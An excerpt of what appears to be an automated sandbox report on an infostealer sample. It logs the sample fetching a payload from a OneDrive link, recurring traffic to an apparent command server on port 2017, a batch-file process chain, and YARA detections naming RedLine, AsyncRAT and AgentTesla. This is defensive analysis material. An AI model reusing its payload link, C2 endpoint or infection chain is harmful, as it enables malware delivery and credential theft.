Jan 23, 2024 14:33:06.750405073 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:06.750423908 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.132833004 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.132910967 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.134718895 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.134732962 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.135057926 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.185904980 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.207705975 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.249912024 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.646083117 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.646289110 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.646353960 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.646532059 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.646547079 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:07.646576881 CET	49710	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:07.646581888 CET	443	49710	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:12.231736898 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:12.276654959 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:12.627803087 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:12.682993889 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:15.108474970 CET	49717	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.108513117 CET	443	49717	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.108607054 CET	49717	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.109458923 CET	49717	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.109536886 CET	443	49717	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.109599113 CET	49717	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.202770948 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.202857971 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.202976942 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.205048084 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.205121040 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.229108095 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:15.568536043 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.568614006 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.571968079 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.571979046 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.572788954 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.614948034 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.623363018 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:15.623451948 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:15.635412931 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:15.677902937 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:15.978279114 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:16.028836966 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:16.124569893 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:16.124670982 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:16.124825954 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:16.125608921 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:16.125655890 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:16.125689983 CET	49718	443	192.168.2.5	150.171.43.11
Jan 23, 2024 14:33:16.125705004 CET	443	49718	150.171.43.11	192.168.2.5
Jan 23, 2024 14:33:16.379718065 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:16.400671005 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:16.796044111 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:16.796142101 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:17.201555014 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:29.111135006 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:29.514475107 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:29.514681101 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:29.869595051 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:29.916277885 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:30.267419100 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:30.298161983 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:30.701654911 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:30.701821089 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:31.107803106 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:42.226964951 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:42.275568962 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:42.626286983 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:42.681930065 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:43.006639957 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:43.398540020 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:43.398643970 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:43.753457069 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:43.806849003 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:44.157635927 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:44.185122013 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:44.576575041 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:44.576659918 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:44.967469931 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:57.640252113 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:58.046679974 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:58.046807051 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:58.402472019 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:58.447707891 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:58.798873901 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:58.813273907 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:59.218770981 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:33:59.219008923 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:33:59.624994993 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:11.549638033 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:11.941252947 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:11.941505909 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:12.240022898 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:12.291301966 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:12.292690039 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:12.338073969 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:12.642455101 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:12.668297052 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:13.060538054 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:13.060745955 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:13.452528954 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:25.445313931 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:25.837235928 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:25.837452888 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:26.193250895 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:26.244431973 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:26.595628023 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:26.612386942 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:27.003207922 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:27.003319979 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:27.395142078 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:39.338130951 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:39.729820967 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:39.730010033 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:40.086463928 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:40.134887934 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:40.485920906 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:40.507489920 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:40.898765087 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:40.899106026 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:41.290958881 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:42.231312990 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:42.275587082 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:42.626985073 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:42.681746960 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:53.242469072 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:53.633554935 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:53.634038925 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:53.989291906 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:54.041177988 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:54.392050982 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:54.406996012 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:54.797605991 CET	2017	49707	139.84.229.159	192.168.2.5
Jan 23, 2024 14:34:54.797676086 CET	49707	2017	192.168.2.5	139.84.229.159
Jan 23, 2024 14:34:55.189600945 CET	2017	49707	139.84.229.159	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 14:32:50.404597998 CET	59976	53	192.168.2.5	1.1.1.1
Jan 23, 2024 14:32:51.391314983 CET	50725	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 14:32:50.404597998 CET	192.168.2.5	1.1.1.1	0x935	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 14:32:51.391314983 CET	192.168.2.5	1.1.1.1	0x3abe	Standard query (0)	ypeqqw.sn.files.1drv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 14:32:50.523600101 CET	1.1.1.1	192.168.2.5	0x935	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 23, 2024 14:32:50.523600101 CET	1.1.1.1	192.168.2.5	0x935	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 23, 2024 14:32:50.523600101 CET	1.1.1.1	192.168.2.5	0x935	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 23, 2024 14:32:50.523600101 CET	1.1.1.1	192.168.2.5	0x935	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Jan 23, 2024 14:32:50.523600101 CET	1.1.1.1	192.168.2.5	0x935	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Jan 23, 2024 14:32:51.567450047 CET	1.1.1.1	192.168.2.5	0x3abe	No error (0)	ypeqqw.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 23, 2024 14:32:51.567450047 CET	1.1.1.1	192.168.2.5	0x3abe	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	150.171.43.11	443	4332	C:\Users\user\Desktop\PCMNil7wkU.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 13:32:51 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-23 13:32:51 UTC	1179	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWBF4-M6t_l3vuys7QE6-LgWc_qZsOSFTN4AxF1Q83vgAUNndNPKDxiwx8a2HptjaOZrVDURPeua8_ttBDBXCBLWsQt5H-jrqRzx5Bt5ytvRis6QssSXvvF0eaiF9Eyd-gkfo3RknEMufGy_S9tgRwDow/255_Akaelkovaac?download&psid=1 Set-Cookie: E=P:75f1yxcc3Ig=:Lwl8fwbiYjxcVe/PSAhzySyyeTMfFqQN3lq0gmdPnqw=:F; domain=.live.com; path=/ Set-Cookie: xid=dbd0ddf4-8e19-4198-b190-1b54163411bc&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:52:51 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:32:51 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: fb9f7fbfd-hhkpl X-ODWebServer: nameastus2300077-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: DC732813CF624D2388DD18985E78E7AD Ref B: BL2AA2030102009 Ref C: 2024-01-23T13:32:51Z Date: Tue, 23 Jan 2024 13:32:50 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	150.171.43.11	443	2504	C:\Users\Public\Libraries\Akaelkov.PIF

Timestamp	Bytes transferred	Direction	Data
2024-01-23 13:33:07 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-23 13:33:07 UTC	1179	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8oWpvASIUp_-vfmq1PGnBx2Oe-zBM5U2YgVgnct2DB3pE8D8E9cRixzHDH_Jmdr7ncJSvifPNPQmMw9zb3pUtTBAN83xFgn3puoyaRYUtDEgRHhMlKO5cl0pf-WKk3su0yEFCGBO438bp3YLWp12-jg/255_Akaelkovaac?download&psid=1 Set-Cookie: E=P:iw6U1Rcc3Ig=:BeGHBie4nXCamnvKZjkpHPaIgNhsZv3pR2qNmCAgJ6E=:F; domain=.live.com; path=/ Set-Cookie: xid=03d6df96-e526-435b-9d32-ca153fd960fc&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:53:07 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:33:07 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: fb9f7fbfd-fjm44 X-ODWebServer: nameastus2300077-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 05D6A42285824EB7AC5E07D0FF068D6C Ref B: BL2AA2030104053 Ref C: 2024-01-23T13:33:07Z Date: Tue, 23 Jan 2024 13:33:07 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	150.171.43.11	443	5616	C:\Users\Public\Libraries\Akaelkov.PIF

Timestamp	Bytes transferred	Direction	Data
2024-01-23 13:33:15 UTC	213	OUT	GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-01-23 13:33:16 UTC	1179	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQA4eEIatRf2a7myXWxPq1oU2UYPzV1UaSQLPTA6u9xIRuqsnjTh-ZV_5zKvE0hHsMluesriyZa26a9_7sPuplCh1eeudYE5VSG0ZTdGuOxubhxpuPd4IgvjaklBpDzVu60XTr2o7rdOCqFBr1UwfsIEQ/255_Akaelkovaac?download&psid=1 Set-Cookie: E=P:Q7Sb2hcc3Ig=:OBmzBcH+2RwtDbZ60RbP5PuJMyPDcZ9VPxclBJIiR8c=:F; domain=.live.com; path=/ Set-Cookie: xid=f8b1bea6-0331-4094-a88a-73cafa1b1711&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:53:15 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:33:16 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: bfc56449b-c5s9n X-ODWebServer: nameastus9685829-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 3D4981DF614B4E7E9B51972CAD2DCEE6 Ref B: BL2AA2030104031 Ref C: 2024-01-23T13:33:15Z Date: Tue, 23 Jan 2024 13:33:15 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	14:32:48
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\PCMNil7wkU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PCMNil7wkU.exe
Imagebase:	0x400000
File size:	1'743'360 bytes
MD5 hash:	344C9C0F72C535E334A4B605212C69D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:32:53
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:32:53
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:32:53
Start date:	23/01/2024
Path:	C:\Users\Public\Libraries\vokleakA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\vokleakA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: 